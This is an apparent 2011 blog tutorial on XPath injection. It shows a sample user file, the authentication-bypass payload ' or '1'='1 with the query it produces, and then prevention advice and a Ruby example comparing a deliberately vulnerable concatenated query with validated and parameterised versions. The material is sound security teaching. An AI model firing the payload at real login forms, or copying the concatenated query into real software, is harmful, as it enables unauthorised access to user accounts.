Sunday 4 September 2011


XPath injection tutorial



XPath injection is a web attack that targets sites which build XPath queries from user-supplied data. XML is queried with XPath, a compact path language whose expressions select nodes in a document. By sending deliberately malformed input, an attacker can learn how the XML data is structured, or read data he would not normally be allowed to access.


XPath injection can be even more dangerous than SQL injection: XPath has no concept of access control, so a single expression can reach any node in the whole XML document, whereas a SQL database enforces per-user permissions and can keep its system tables out of reach of ordinary queries.


Here is a demonstration. The technique is very similar to an SQL injection attack.


Consider this user.xml file, which the application searches when someone logs in:


<?xml version="1.0" encoding="UTF-8"?> 
<users> 
      <user>  
          <firstname>Ben</firstname>
          <lastname>Elmore</lastname> 
          <loginID>abc</loginID> 
          <password>test123</password> 
      </user> 
      <user>  
          <firstname>Shlomy</firstname>
          <lastname>Gantz</lastname>
          <loginID>xyz</loginID> 
          <password>123test</password> 
      </user> 
      <user>  
          <firstname>Jeghis</firstname>
          <lastname>Katz</lastname>
          <loginID>mrj</loginID> 
          <password>jk2468</password> 
      </user> 
      <user>  
          <firstname>Darien</firstname>
          <lastname>Heap</lastname>
          <loginID>drano</loginID> 
          <password>2mne8s</password> 
      </user> 
 </users>




The application checks the login form by building this XPath query from the submitted loginID and password (here for the user abc with password test123):
//users/user[loginID/text()='abc' and password/text()='test123']


Now bypassing authentication. XPath is case-sensitive (so the element must be written loginID, not LoginID), and "and" binds tighter than "or", so the predicate below is read as (loginID='') or (1=1 and password='') or (1=1), which is true for every user node and returns all four users:
//users/user[loginID/text()='' or 1=1 and password/text()='' or 1=1]

To obtain a well-formed query from the application's template, type the following into both the loginID and the password field:
' or '1'='1
The query the application then runs is
//users/user[loginID/text()='' or '1'='1' and password/text()='' or '1'='1']
which again matches every user, so the attacker is logged in as the first account in the file without knowing any password.







Prevention


XPath injection is prevented in the same way as SQL injection. The main countermeasures are:

  1. Input validation: accept only the characters a login ID can legitimately contain (for example letters and digits) and reject everything else, in particular the quote characters needed to close the XPath string literal.
  2. Parameterised queries: keep the XPath expression fixed and bind the user input to XPath variables (for example $login and $password) through the XPath API's variable binding, so the input is compared as data and can never become part of the expression. Escaping is a weaker fallback, because XPath 1.0 has no escape sequence for a quote inside a string literal.
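As an added example that is not part of the original tutorial, the login check above, the bypass, and both countermeasures in Ruby, using the standard library's REXML XPath engine. The function names build_query, login_vulnerable, valid_login_id? and login_safe, the variable names $login and $pw, and the login-ID format are my own choices; the XML is a constructed copy of the user.xml above.

```ruby
require 'rexml/document'

# Constructed copy of the tutorial's user.xml, embedded so the example runs offline.
USER_XML = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <users>
    <user><firstname>Ben</firstname><lastname>Elmore</lastname><loginID>abc</loginID><password>test123</password></user>
    <user><firstname>Shlomy</firstname><lastname>Gantz</lastname><loginID>xyz</loginID><password>123test</password></user>
    <user><firstname>Jeghis</firstname><lastname>Katz</lastname><loginID>mrj</loginID><password>jk2468</password></user>
    <user><firstname>Darien</firstname><lastname>Heap</lastname><loginID>drano</loginID><password>2mne8s</password></user>
  </users>
XML

USERS = REXML::Document.new(USER_XML)

# Vulnerable: the predicate is assembled by string concatenation, exactly as in
# the tutorial, so quote characters in the input become XPath syntax.
def build_query(login, password)
  "//users/user[loginID/text()='#{login}' and password/text()='#{password}']"
end

# Returns the loginIDs of every <user> the concatenated query matches.
def login_vulnerable(login, password)
  REXML::XPath.match(USERS, build_query(login, password))
              .map { |u| u.elements['loginID'].text }
end

# Countermeasure 1: input validation (assumed policy: a login ID is 1-32 letters
# or digits). The quote needed to break out of the string literal is rejected.
LOGIN_ID_FORMAT = /\A[A-Za-z0-9]{1,32}\z/

def valid_login_id?(login)
  !!(LOGIN_ID_FORMAT =~ login)
end

# Countermeasure 2: parameterised query. The expression text is constant; the
# input is bound to the XPath variables $login and $pw, so it is compared as a
# plain string value and cannot change the structure of the predicate.
SAFE_QUERY = '//users/user[loginID/text()=$login and password/text()=$pw]'

def login_safe(login, password)
  REXML::XPath.match(USERS, SAFE_QUERY, {}, { 'login' => login, 'pw' => password })
              .map { |u| u.elements['loginID'].text }
end

if __FILE__ == $PROGRAM_NAME
  payload = "' or '1'='1"
  puts build_query(payload, payload)     # the query the attacker makes the app run
  p login_vulnerable('abc', 'test123')   # legitimate login -> ["abc"]
  p login_vulnerable(payload, payload)   # injection -> every user in the file
  p valid_login_id?(payload)             # false: rejected before any query is built
  p login_safe(payload, payload)         # []: the payload is just a string to compare
end
```

Run it with ruby and compare the two login functions on the same payload: the concatenated query returns all four accounts, the bound-variable query returns none, and the format check refuses the payload before a query is even built.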
